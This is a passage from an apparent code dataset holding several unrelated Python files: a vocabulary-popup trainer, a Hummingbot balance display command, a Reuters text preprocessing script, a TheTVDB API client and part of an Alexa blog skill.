loop(data):\r\n while True:\r\n linenr = randint(0, len(data) - 1)\r\n line = data[linenr]\r\n \r\n line = line.replace(\"\\n\", \"\")\r\n voc = line.split(\"\\t\")\r\n voc = ( re.sub(\"\\{.*\\}\", \"\", voc[0]), re.sub(\"\\{.*\\}\", \"\", voc[1]) ) \r\n \r\n \r\n easygui.msgbox(voc[0] + \" - \" + voc[1], title=\"dictTrainer\")\r\n minInt = int(linecache.getline(prop, 1))\r\n time.sleep(minInt * 60)\r\n linecache.updatecache(prop)\r\n sleepHours = int(linecache.getline(prop, 2))\r\n time.sleep(sleepHours * 3600)\r\n \r\n # change sleep hours back to zero\r\n with open(prop, 'r') as f:\r\n proptemp = f.readlines()\r\n proptemp[1] = \"0\\n\"\r\n with open(prop, 'w') as f:\r\n f.writelines( proptemp )\r\n f.close()\r\n \r\n\r\nif __name__ == \"__main__\":\r\n data = read_data()\r\n pprint.pprint(data)\r\n loop(data)\r\n", "sub_path": "dictTrainer/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1665, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "linecache.getline", "line_number": 25, "usage_type": "call"}, {"api_name": "linecache.getline", "line_number": 29, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 37, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 42, "usage_type": "call"}, {"api_name": "easygui.msgbox", "line_number": 45, "usage_type": "call"}, {"api_name": "linecache.getline", "line_number": 46, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 47, "usage_type": "call"}, {"api_name": "linecache.updatecache", "line_number": 48, "usage_type": "call"}, {"api_name": "linecache.getline", "line_number": 49, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 50, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "578888809", "text": "from hummingbot.user.user_balances import UserBalances\nfrom hummingbot.core.utils.async_utils import safe_ensure_future\nfrom hummingbot.core.utils.exchange_rate_conversion import ExchangeRateConversion as ERC\nfrom hummingbot.client.config.global_config_map import global_config_map\nimport pandas as pd\nfrom numpy import NaN\nfrom typing import TYPE_CHECKING\nif TYPE_CHECKING:\n from hummingbot.client.hummingbot_application import HummingbotApplication\n\n\nclass BalanceCommand:\n def balance(self):\n 
safe_ensure_future(self.show_balances())\n\n async def show_balances(self):\n self._notify(\"Updating balances, please wait...\")\n df = await self.balances_df()\n lines = [\" \" + line for line in df.to_string(index=False).split(\"\\n\")]\n self._notify(\"\\n\".join(lines))\n eth_address = global_config_map[\"ethereum_wallet\"].value\n if eth_address is not None:\n bal = UserBalances.ethereum_balance()\n bal = round(bal, 4)\n self._notify(f\"Ethereum balance in ...{eth_address[-4:]} wallet: {bal} ETH\")\n self._notify(f\"Note: You may have other ERC 20 tokens in this same address (not shown here).\")\n\n async def balances_df(self # type: HummingbotApplication\n ):\n all_ex_bals = await UserBalances.instance().all_balances_all_exchanges()\n ex_columns = [ex for ex, bals in all_ex_bals.items() if any(bal > 0 for bal in bals.values())]\n rows = []\n for exchange, bals in all_ex_bals.items():\n for token, bal in bals.items():\n if bal == 0:\n continue\n token = token.upper()\n if not any(r.get(\"Symbol\") == token for r in rows):\n rows.append({\"Symbol\": token})\n row = [r for r in rows if r[\"Symbol\"] == token][0]\n row[exchange] = round(bal, 4)\n for row in rows:\n ex_total = 0\n for ex, amount in row.items():\n try:\n if ex != \"Symbol\":\n ex_total += ERC.get_instance().convert_token_value_decimal(amount, row[\"Symbol\"], \"USD\")\n except Exception:\n continue\n row[\"Total(USD)\"] = round(ex_total, 2)\n last_row = {\"Symbol\": \"Total(USD)\"}\n for ex in ex_columns:\n token_total = 0\n for row in rows:\n try:\n token_total += ERC.get_instance().convert_token_value_decimal(row[ex], row[\"Symbol\"], \"USD\")\n except Exception:\n continue\n last_row[ex] = round(token_total, 2)\n last_row[\"Total(USD)\"] = round(sum(amount for ex, amount in last_row.items() if ex in ex_columns), 2)\n ex_columns.sort(key=lambda ex: last_row[ex], reverse=True)\n columns = [\"Symbol\"] + ex_columns + [\"Total(USD)\"]\n df = pd.DataFrame(data=rows, columns=columns)\n df = df.replace(NaN, 0)\n df.sort_values(by=[\"Total(USD)\"], inplace=True, ascending=False)\n df = df.append(last_row, ignore_index=True, sort=False)\n return df\n", "sub_path": "hummingbot/client/command/balance_command.py", "file_name": "balance_command.py", "file_ext": "py", "file_size_in_byte": 3133, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "typing.TYPE_CHECKING", "line_number": 8, "usage_type": "name"}, {"api_name": "hummingbot.core.utils.async_utils.safe_ensure_future", "line_number": 14, "usage_type": "call"}, {"api_name": "hummingbot.client.config.global_config_map.global_config_map", "line_number": 21, "usage_type": "name"}, {"api_name": "hummingbot.user.user_balances.UserBalances.ethereum_balance", "line_number": 23, "usage_type": "call"}, {"api_name": "hummingbot.user.user_balances.UserBalances", "line_number": 23, "usage_type": "name"}, {"api_name": "hummingbot.user.user_balances.UserBalances.instance", "line_number": 30, "usage_type": "call"}, {"api_name": "hummingbot.user.user_balances.UserBalances", "line_number": 30, "usage_type": "name"}, {"api_name": "hummingbot.core.utils.exchange_rate_conversion.ExchangeRateConversion.get_instance", "line_number": 47, "usage_type": "call"}, {"api_name": "hummingbot.core.utils.exchange_rate_conversion.ExchangeRateConversion", "line_number": 47, "usage_type": "name"}, {"api_name": "hummingbot.core.utils.exchange_rate_conversion.ExchangeRateConversion.get_instance", "line_number": 56, "usage_type": "call"}, 
{"api_name": "hummingbot.core.utils.exchange_rate_conversion.ExchangeRateConversion", "line_number": 56, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.NaN", "line_number": 64, "usage_type": "argument"}]} +{"seq_id": "66200271", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: Afnan\r\nNote: some of this is carried over from lab 1\r\n\"\"\"\r\nfrom bs4 import BeautifulSoup\r\nfrom typing import Tuple\r\nimport csv\r\nimport re\r\n# BEGIN PART FROM https://towardsdatascience.com/implementing-a-trie-data-structure-in-python-in-less-than-100-lines-of-code-a877ea23c1a1\r\nclass TrieNode(object):\r\n    \"\"\"\r\n    Trie node implementation.\r\n    \"\"\"\r\n    \r\n    def __init__(self, char: str):\r\n        self.char = char\r\n        self.children = []\r\n        # Is it the last character of the word.\r\n        self.word_finished = False\r\n        # How many times this character appeared in the addition process\r\n        self.counter = 1\r\n    \r\n\r\ndef add(root, word: str):\r\n    \"\"\"\r\n    Adding a word to the trie structure\r\n    \"\"\"\r\n    node = root\r\n    for char in word:\r\n        found_in_child = False\r\n        # Search for the character in the children of the present `node`\r\n        for child in node.children:\r\n            if child.char == char:\r\n                # We found it, increase the counter by 1 to keep track that another\r\n                # word has it as well\r\n                child.counter += 1\r\n                # And point the node to the child that contains this char\r\n                node = child\r\n                found_in_child = True\r\n                break\r\n        # We did not find it so add a new child\r\n        if not found_in_child:\r\n            new_node = TrieNode(char)\r\n            node.children.append(new_node)\r\n            # And then point node to the new child\r\n            node = new_node\r\n    # Everything finished. Mark it as the end of a word.\r\n    node.word_finished = True\r\n\r\n\r\ndef find_prefix(root, prefix: str) -> Tuple[bool, int]:\r\n    \"\"\"\r\n    Check and return \r\n    1. If the prefix exists in any of the words we added so far\r\n    2. If yes then how many words actually have the prefix\r\n    \"\"\"\r\n    node = root\r\n    # If the root node has no children, then return False.\r\n    # Because it means we are trying to search in an empty trie\r\n    if not root.children:\r\n        return False, 0\r\n    for char in prefix:\r\n        char_not_found = True\r\n        # Search through all the children of the present `node`\r\n        for child in node.children:\r\n            if child.char == char:\r\n                # We found the char existing in the child.\r\n                char_not_found = False\r\n                # Assign node as the child containing the char and break\r\n                node = child\r\n                break\r\n        # Return False anyway when we did not find a char.\r\n        if char_not_found:\r\n            return False, 0\r\n    # Well, we are here means we have found the prefix. Return true to indicate that\r\n    # And also the counter of the last node. 
This indicates how many words have this\r\n    # prefix\r\n    return True, node.counter\r\n\r\n# END PART FROM https://towardsdatascience.com/implementing-a-trie-data-structure-in-python-in-less-than-100-lines-of-code-a877ea23c1a1\r\n\r\n# This method works like str.split, but splits for as many times as a delimiter shows up in the doc\r\n# It is also original work based on prior knowledge of how string splits work in Python.\r\ndef multi_splitter(input_string, delimiter): \r\n    out_strings = []\r\n    new_sub = str(input_string).split(delimiter)\r\n    for str_element in new_sub:\r\n        sub = str_element.split(\"</D>\")  # keep only the text before the closing </D> tag\r\n        out_strings.append(sub[0])\r\n    return out_strings\r\n\r\n\r\ndef get_text(place, sources, places_bag_vector, t_type):\r\n    # This portion involving reading the body text in from the file mostly done by Kumar\r\n    print (place)\r\n    total_text = \"\"\r\n    for source in sources:\r\n        with open(source) as f:\r\n            data = f.read()\r\n        soup = BeautifulSoup(data, 'html.parser') # parse using HTML parser, close to structure of these files\r\n        reuters_tags = soup.find_all('reuters')\r\n        for reuter_tag in reuters_tags: # get information stored within each reuters tag\r\n            if t_type == 'topics':\r\n                p_tag = reuter_tag.topics\r\n            else:\r\n                p_tag = reuter_tag.places\r\n            d_tags = p_tag.find_all('d') # find all places/topics mentioned\r\n            for d_tag in d_tags:\r\n                for child in d_tag.children: # find relevant tags to current call and add text to a master string\r\n                    if(place == child):\r\n                        try:\r\n                            total_text += reuter_tag.body.get_text()\r\n                        except:\r\n                            total_text += \"\"\r\n    \r\n    # This subsequent section is devoted to removing a few bits of rather unwieldy extra characters in our \r\n    # output string. We wanted to retain as many words as possible, so more tedious methods of extraction,\r\n    # such as removing '\\n' from the MIDDLE of the word was required. This part written by Afnan.\r\n    array = total_text.split()\r\n    new_array = []\r\n    for word in array: # each word gets examined and picked apart if it contains the offending characters\r\n        new_word = \"\"\r\n        if '\\n' in word: # removing line breaks, wherever they may occur\r\n            subword = word.split('\\n')\r\n            for part in subword:\r\n                if '\\n' not in part:\r\n                    new_word += part\r\n            word = new_word\r\n            new_word = \"\"\r\n        if '.' in word: # removing punctuation\r\n            subword = word.split('.')\r\n            for part in subword:\r\n                if '.' 
not in part:\r\n                    new_word += part\r\n            word = new_word\r\n        new_word = \"\"\r\n        if ',' in word: # removing punctuation\r\n            subword = word.split(',')\r\n            for part in subword:\r\n                if ',' not in part:\r\n                    new_word += part\r\n            word = new_word\r\n        new_word = \"\"\r\n        if '\"' in word: # removing punctuation\r\n            subword = word.split('\"')\r\n            for part in subword:\r\n                if '\"' not in part:\r\n                    new_word += part\r\n            word = new_word\r\n        word += \" \"\r\n        new_array.append(word)\r\n    \r\n    cleaned_text = \"\"\r\n    for newword in new_array:# now removing some final pesky words as well as any numbers we don't want in our analysis\r\n        if \"reuter\" not in newword.lower() and \"\\x03\" not in newword and '\"' not in newword and newword.isdigit() == False:\r\n            cleaned_text += newword \r\n    \r\n    # Create vector and return to calling function\r\n    places_bag_vector[place] = cleaned_text\r\n    # output looks like: {'afghanistan' : 'Pakistan complained to the United Nations today that...', 'algeria' : 'Liquefied natural gas imports from Algeria...', ....}\r\n    return places_bag_vector\r\n\r\n\r\n\r\ndef weighted_get_text(header_importance, place, sources, weighted_bag_vector, t_type):\r\n\r\n    # This portion involving reading the body text in from the file mostly done by Kumar\r\n    print (place)\r\n    total_text = \"\"\r\n    for source in sources:\r\n        with open(source) as f:\r\n            data = f.read()\r\n        soup = BeautifulSoup(data, 'html.parser') # parse using HTML parser, close to structure of these files\r\n        reuters_tags = soup.find_all('reuters')\r\n        for reuter_tag in reuters_tags: # get information stored within each reuters tag\r\n            if t_type == 'topics':\r\n                p_tag = reuter_tag.topics\r\n            else:\r\n                p_tag = reuter_tag.places\r\n            \r\n            d_tags = p_tag.find_all('d') # find all places/topics mentioned\r\n            for d_tag in d_tags:\r\n                for child in d_tag.children: # find relevant tags to current call and add text to a master string\r\n                    if(place == child):\r\n                        \r\n                        try:\r\n                            total_text += reuter_tag.body.get_text()\r\n                        except:\r\n                            total_text += \"\"\r\n\r\n                        title_tags = reuter_tag.find_all('title')\r\n                        if (len(title_tags) > 0):\r\n                            for title_tag in title_tags:\r\n                                for i in range(header_importance):\r\n                                    total_text += title_tag.get_text()\r\n                                    total_text += ' '\r\n    \r\n    # This subsequent section is devoted to removing a few bits of rather unwieldy extra characters in our \r\n    # output string. We wanted to retain as many words as possible, so more tedious methods of extraction,\r\n    # such as removing '\n' from the MIDDLE of the word was required. This part written by Afnan.\r\n    array = total_text.split()\r\n    new_array = []\r\n    for word in array: # each word gets examined and picked apart if it contains the offending characters\r\n        new_word = \"\"\r\n        if '\n' in word: # removing line breaks, wherever they may occur\r\n            subword = word.split('\n')\r\n            for part in subword:\r\n                if '\n' not in part:\r\n                    new_word += part\r\n            word = new_word\r\n        new_word = \"\"\r\n        if '.' in word: # removing punctuation\r\n            subword = word.split('.')\r\n            for part in subword:\r\n                if '.' not in part:\r\n                    new_word += part\r\n            word = new_word\r\n        new_word = \"\"\r\n        if ',' in word: # removing punctuation\r\n            subword = word.split(',')\r\n            for part in subword:\r\n                if ',' not in part:\r\n                    new_word += part\r\n            word = new_word\r\n        new_word = \"\"\r\n        if '\"' in word: # removing punctuation\r\n            subword = word.split('\"')\r\n            for part in subword:\r\n                if '\"' not in part:\r\n                    new_word += part\r\n            word = new_word\r\n        new_word = \"\"\r\n        if '<' in word: # removing punctuation\r\n            subword = word.split('<')\r\n            for part in subword:\r\n                if '<' not in part:\r\n                    new_word += part\r\n            word = new_word\r\n        new_word = \"\"\r\n        if '>' in word: # removing punctuation\r\n            subword = word.split('>')\r\n            for part in subword:\r\n                if '>' not in part:\r\n                    new_word += part\r\n            word = new_word\r\n        word += \" \"\r\n        new_array.append(word)\r\n    \r\n    cleaned_text = \"\"\r\n    for newword in new_array:# now removing some final pesky words as well as any numbers we don't want in our analysis\r\n        if \"reuter\" not in newword.lower() and \"\\x03\" not in newword and '\"' not in newword and newword.isdigit() == False:\r\n            if (re.search(place, newword, re.IGNORECASE)):\r\n                for i in range(header_importance * 2):\r\n                    cleaned_text += newword\r\n            else:\r\n                cleaned_text += newword\r\n    \r\n    cleaned_text = cleaned_text.rstrip()\r\n\r\n    wordList = []\r\n    words = re.findall(r'\\b[a-zA-Z]+\\b', cleaned_text)\r\n    for word in words:\r\n        wordList.append(word.lower())\r\n\r\n    wordPairs = []\r\n    for word in set(wordList):\r\n        wordPairs.append([word, wordList.count(word)])\r\n    \r\n    cleaned_text = \"\"\r\n    for wordPair in wordPairs:\r\n        if wordPair[1] > 1:\r\n            for i in range(wordPair[1]):\r\n                cleaned_text += wordPair[0] + ' '\r\n    \r\n    # Create vector and return to calling function\r\n    weighted_bag_vector[place] = cleaned_text\r\n    # output looks like: {'afghanistan' : 'Pakistan complained to the United Nations today that...', 'algeria' : 'Liquefied natural gas imports from Algeria...', ....}\r\n    return weighted_bag_vector\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    sources = [\"files/reut2-000.sgm\", \"files/reut2-001.sgm\", \"files/reut2-002.sgm\", \\\r\n               \"files/reut2-003.sgm\", \"files/reut2-004.sgm\", \"files/reut2-005.sgm\", \\\r\n               \"files/reut2-006.sgm\", \"files/reut2-007.sgm\", \"files/reut2-008.sgm\", \\\r\n               \"files/reut2-009.sgm\", \"files/reut2-010.sgm\", \"files/reut2-011.sgm\", \\\r\n               \"files/reut2-012.sgm\", \"files/reut2-013.sgm\", \"files/reut2-014.sgm\", \\\r\n               \"files/reut2-015.sgm\", \"files/reut2-016.sgm\", \"files/reut2-017.sgm\", \\\r\n               \"files/reut2-018.sgm\", \"files/reut2-019.sgm\", \"files/reut2-020.sgm\", \\\r\n               \"files/reut2-021.sgm\"]\r\n    \r\n    total_blank_places = 0\r\n    total_blank_topics = 0\r\n    total_countries = []\r\n    total_topics = []\r\n    root = TrieNode('*')\r\n    \r\n    \r\n    # Here, my algorithm for splitting the elements of the TOPICS and PLACES fields is my original work\r\n    for source in sources:\r\n        with open(source) as f: # Open the file and read line by line to a list array\r\n            array = []\r\n            for line in f:\r\n                array.append(line)\r\n        # Since PLACES were contained within one line of code according to the data I saw, I assumed \r\n        # that any line with the PLACES tag would contain all of the location info for that article\r\n        places = []\r\n        for index in array: # Look at lines containing the \"PLACES\" tag and read those into a separate list\r\n            if \"<PLACES>\" in index:\r\n                places.append(index)\r\n        # Once I got the line, I split the string on the multiple \"<D>\" tags to extract the location\r\n        # information within\r\n
        new_places = []\r\n        for place in places:\r\n            new_places.extend(multi_splitter(place, \"<D>\")) # Using the helpful method above, I split on one or more tags\r\n        new_places = [x for x in new_places if x not in ('', '/', '\n', '<PLACES>', '</PLACES>')]# I then removed instances of tag information or blank information from the overall list\r\n        \r\n        # One trick I learned in coding Python for work is that by casting a list as a set, \r\n        # you can remove duplicates in one line of code since sets do not contain duplicates\r\n        distinct_countries = set(new_places)\r\n        total_countries.extend(distinct_countries)\r\n        \r\n        # Next I moved onto TOPICS, using many of the same methods\r\n        # that I used for PLACES to count and extract the information\r\n        topics = []\r\n        for index in array:\r\n            if \"<TOPICS>\" in index:\r\n                topics.append(index)\r\n        \r\n        # Once again I used the same string split method to extract the contents of each field\r\n        tops = []\r\n        for topic in topics:\r\n            tops.extend(multi_splitter(topic, \"<D>\"))\r\n        tops = [x for x in tops if x not in ('', '/', '\n', '<TOPICS>', '</TOPICS>')]\r\n        \r\n        # Counted distinct topics using the same cast to set \r\n        distinct_topics = set(tops)\r\n        # You may notice the issue with simply extending the list of total topics\r\n        # There may end up being duplicates between documents that are not addressed\r\n        # I address this issue in the final step: printing the statistics after all loops are finished\r\n        total_topics.extend(distinct_topics)\r\n    \r\n    # Here, we create all output vectors already sorted into training and test groups based on cross-validation where k = 21\r\n    # These files are then fed into the classifier program \r\n    for i in range(3):\r\n        training_sources = sources[:i] + sources[i+1:]\r\n        test_sources = []\r\n        test_sources.append(sources[i])\r\n        # Here we begin to make our bag of words vectors\r\n        # First we make the training groups\r\n        \r\n        # TEST SET FOR SPEED\r\n        total_countries = ['afghanistan', 'uk', 'france', 'canada','turkey','usa','japan','pakistan']\r\n        total_topics = ['acq', 'alum', 'lumber', 'jobs', 'interest', 'income','trade', 'wheat']\r\n        # TEST\r\n        \r\n\r\n        #\r\n        # Vector 1: Generic Bag of Words method. Uses get_text to create bag of words.\r\n        #\r\n        bag_vector = {}\r\n        for country in sorted(set(total_countries)):\r\n            if \"<\" not in country:\r\n                get_text(country, training_sources, bag_vector, 'places')\r\n        with open('place_bag_train' + str(i) + '.csv', 'w') as csv_file:\r\n            writer = csv.writer(csv_file)\r\n            writer.writerow([\"country\", \"text\"])\r\n            for key, value in bag_vector.items():\r\n                writer.writerow([key, value])\r\n\r\n        bag_vector = {}\r\n        for topic in sorted(set(total_topics)):\r\n            if \"<\" not in topic:\r\n                get_text(topic, training_sources, bag_vector, 'topics')\r\n        with open('topic_bag_train' + str(i) + '.csv', 'w') as csv_file:\r\n            writer = csv.writer(csv_file)\r\n            writer.writerow([\"topic\", \"text\"])\r\n            for key, value in bag_vector.items():\r\n                writer.writerow([key, value])\r\n\r\n        # Testing bag of words data.\r\n        bag_vector = {}\r\n        for country in sorted(set(total_countries)):\r\n            if \"<\" not in country:\r\n                get_text(country, test_sources, bag_vector, 'places')\r\n        with open('place_bag_test' + str(i) + '.csv', 'w') as csv_file:\r\n            writer = csv.writer(csv_file)\r\n            writer.writerow([\"id\", \"text\"])\r\n            for key, value in bag_vector.items():\r\n                writer.writerow([key, value])\r\n\r\n        bag_vector = {}\r\n        for topic in sorted(set(total_topics)):\r\n            if \"<\" not in topic:\r\n                get_text(topic, test_sources, bag_vector, 'topics')\r\n        with open('topic_bag_test' + str(i) + '.csv', 'w') as csv_file:\r\n            writer = csv.writer(csv_file)\r\n            writer.writerow([\"id\", \"text\"])\r\n            for key, value in bag_vector.items():\r\n                writer.writerow([key, value])\r\n\r\n        #\r\n        # Vector 2: Weighted Bag of Words method. Uses weighted_get_text to create bag of words. Title words are five times as important,\r\n        # the name of the place or topic is ten times as important, and words which only appear once are removed from the bag of words.\r\n        # Words are added multiple times based on their importance.\r\n        #\r\n        weighted_bag_vector = {}\r\n        for country in sorted(set(total_countries)):\r\n            if \"<\" not in country:\r\n                weighted_get_text(5, country, training_sources, weighted_bag_vector, 'places')\r\n        with open('place_weighted_train' + str(i) + '.csv', 'w') as csv_file:\r\n            writer = csv.writer(csv_file)\r\n            writer.writerow([\"country\", \"text\"])\r\n            for key, value in weighted_bag_vector.items():\r\n                writer.writerow([key, value])\r\n        \r\n        weighted_bag_vector = {}\r\n        for topic in sorted(set(total_topics)):\r\n            if \"<\" not in topic:\r\n                weighted_get_text(5, topic, training_sources, weighted_bag_vector, 'topics')\r\n        with open('topic_weighted_train' + str(i) + '.csv', 'w') as csv_file:\r\n            writer = csv.writer(csv_file)\r\n            writer.writerow([\"topic\", \"text\"])\r\n            for key, value in weighted_bag_vector.items():\r\n                writer.writerow([key, value])\r\n\r\n        # Testing modified bag of words data.\r\n        weighted_bag_vector = {}\r\n        for country in sorted(set(total_countries)):\r\n            if \"<\" not in country:\r\n                weighted_get_text(5, country, test_sources, weighted_bag_vector, 'places')\r\n        with open('place_weighted_test' + str(i) + '.csv', 'w') as csv_file:\r\n            writer = csv.writer(csv_file)\r\n            writer.writerow([\"id\", \"text\"])\r\n            for key, value in weighted_bag_vector.items():\r\n                writer.writerow([key, value])\r\n        \r\n        weighted_bag_vector = {}\r\n        for topic in sorted(set(total_topics)):\r\n            if \"<\" not in topic:\r\n                weighted_get_text(5, topic, test_sources, weighted_bag_vector, 'topics')\r\n        with open('topic_weighted_test' + str(i) + '.csv', 'w') as csv_file:\r\n            writer = csv.writer(csv_file)\r\n            writer.writerow([\"id\", 
\"text\"])\r\n for key, value in weighted_bag_vector.items():\r\n writer.writerow([key, value])\r\n \r\n \r\n \r\n \r\n \r\n \r\n", "sub_path": "countTagsFinalWeighted.py", "file_name": "countTagsFinalWeighted.py", "file_ext": "py", "file_size_in_byte": 20498, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "typing.Tuple", "line_number": 52, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 101, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 174, "usage_type": "call"}, {"api_name": "re.search", "line_number": 253, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 253, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 262, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 366, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 376, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 387, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 397, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 412, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 422, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 433, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 443, "usage_type": "call"}]} +{"seq_id": "126231612", "text": "import requests\nimport json\nimport yaml\nfrom pprint import pprint\nimport os\r\nfrom jinja2 import Environment, FileSystemLoader\r\n\r\nPATH = os.path.dirname(os.path.abspath(__file__))\r\nTEMPLATE_ENVIRONMENT = Environment(\r\n autoescape=False,\r\n loader=FileSystemLoader(os.path.join(PATH, 'templates')),\r\n trim_blocks=False)\r\n\ndef load_settings():\n with open(\"settings.yml\", 'r') as stream:\n try:\n settings = yaml.load(stream)\n except yaml.YAMLError as exc:\n print(exc)\n return settings\n\ndef get_token(settings):\n payload= {\"apikey\":settings['api_key'],\n \"username\":settings['user_name'],\n \"userkey\":settings['user_key']}\n r = requests.post(settings['url'] + \"/login\", json=payload)\n response = r.json()\n token = response[\"token\"]\n return token\n \ndef get_series(settings, token): \n headers = {'Authorization': 'Bearer ' + token}\n payload = {'name': 'Star Trek Discovery'}\n r = requests.get(settings['url'] + \"/search/series\",\n params=payload, headers=headers)\n response = r.json()\n return response\n\n\ndef get_series_details(settings, token, sid):\n headers = {'Authorization': 'Bearer ' + token}\n r = requests.get(settings['url'] + \"/series/\" + \n str(sid) + \"/episodes\", headers=headers)\n response = r.json()\n return response\n \ndef render_template(template_filename, context):\r\n return TEMPLATE_ENVIRONMENT.get_template(template_filename).render(context)\r\n\ndef create_md(series, series_details):\n fname = \"output.md\"\n context = { 'series_details': series_details,\n 'series': series['data'][0]\n }\n with open(fname, 'w') as f: \n content = render_template('output.j2', context) \n f.write(content) \n\ndef main():\n settings = load_settings()\n token = get_token(settings) \n series = get_series(settings, token)\n series_id = series['data'][0]['id']\n series_details = get_series_details(settings, token, series_id)\n create_md(series, series_details)\n \nif __name__ == \"__main__\":\n main()\n \n\n", "sub_path": "tvdb/tvdb.py", "file_name": "tvdb.py", "file_ext": "py", "file_size_in_byte": 2112, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": 
"code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.dirname", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 8, "usage_type": "call"}, {"api_name": "jinja2.Environment", "line_number": 9, "usage_type": "call"}, {"api_name": "jinja2.FileSystemLoader", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 17, "usage_type": "call"}, {"api_name": "yaml.YAMLError", "line_number": 18, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 26, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 34, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "575180067", "text": "import logging\nimport requests\n\nfrom ask_sdk_core.skill_builder import SkillBuilder\nfrom ask_sdk_core.dispatch_components import AbstractRequestHandler\nfrom ask_sdk_core.dispatch_components import AbstractExceptionHandler\nimport ask_sdk_core.utils as ask_utils\nfrom ask_sdk_core.handler_input import HandlerInput\n\nfrom ask_sdk_model import Response\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nclass LaunchRequestHandler(AbstractRequestHandler):\n \"\"\"Handler for Skill Launch.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n\n return ask_utils.is_request_type(\"LaunchRequest\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speak_output = \"Ciao, puoi chiedermi di darti l'ultimo articolo\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\n\nclass BlogIntentHandler(AbstractRequestHandler):\n \"\"\"Handler for Hello World Intent.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_intent_name(\"BlogIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n\n data = requests.get(\"https://www.20tab.com/api/articles.json?page_size=1\").json()\n\n try:\n title = data[\"results\"][0]['title_it']\n speak_output = f\"L'ultimo articolo ha come titolo: {title}\"\n except KeyError:\n speak_output = \"Mi dispiace ma non ho trovato alcun articolo\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n # .ask(\"add a reprompt if you want to keep the session open for the user to respond\")\n .response\n )\n\n\nclass HelpIntentHandler(AbstractRequestHandler):\n \"\"\"Handler for Help Intent.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_intent_name(\"AMAZON.HelpIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speak_output = \"Puoi chiedermi di dirti qual'è l'ultimo articolo\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\n\nclass CancelOrStopIntentHandler(AbstractRequestHandler):\n \"\"\"Single handler for Cancel and Stop Intent.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return (ask_utils.is_intent_name(\"AMAZON.CancelIntent\")(handler_input) or\n ask_utils.is_intent_name(\"AMAZON.StopIntent\")(handler_input))\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speak_output = 
\"Goodbye!\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .response\n )\n\n\nclass SessionEndedRequestHandler(AbstractRequestHandler):\n \"\"\"Handler for Session End.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_request_type(\"SessionEndedRequest\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n\n # Any cleanup logic goes here.\n\n return handler_input.response_builder.response\n\n\nclass CatchAllExceptionHandler(AbstractExceptionHandler):\n \"\"\"Generic error handling to capture any syntax or routing errors. If you receive an error\n stating the request handler chain is not found, you have not implemented a handler for\n the intent being invoked or included it in the skill builder below.\n \"\"\"\n def can_handle(self, handler_input, exception):\n # type: (HandlerInput, Exception) -> bool\n return True\n\n def handle(self, handler_input, exception):\n # type: (HandlerInput, Exception) -> Response\n logger.error(exception, exc_info=True)\n\n speak_output = \"Si è verificato un errore. Riprova\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\n# The SkillBuilder object acts as the entry point for your skill, routing all request and response\n# payloads to the handlers above. Make sure any new handlers or interceptors you've\n# defined are included below. The order matters - they're processed top to bottom.\n\nsb = 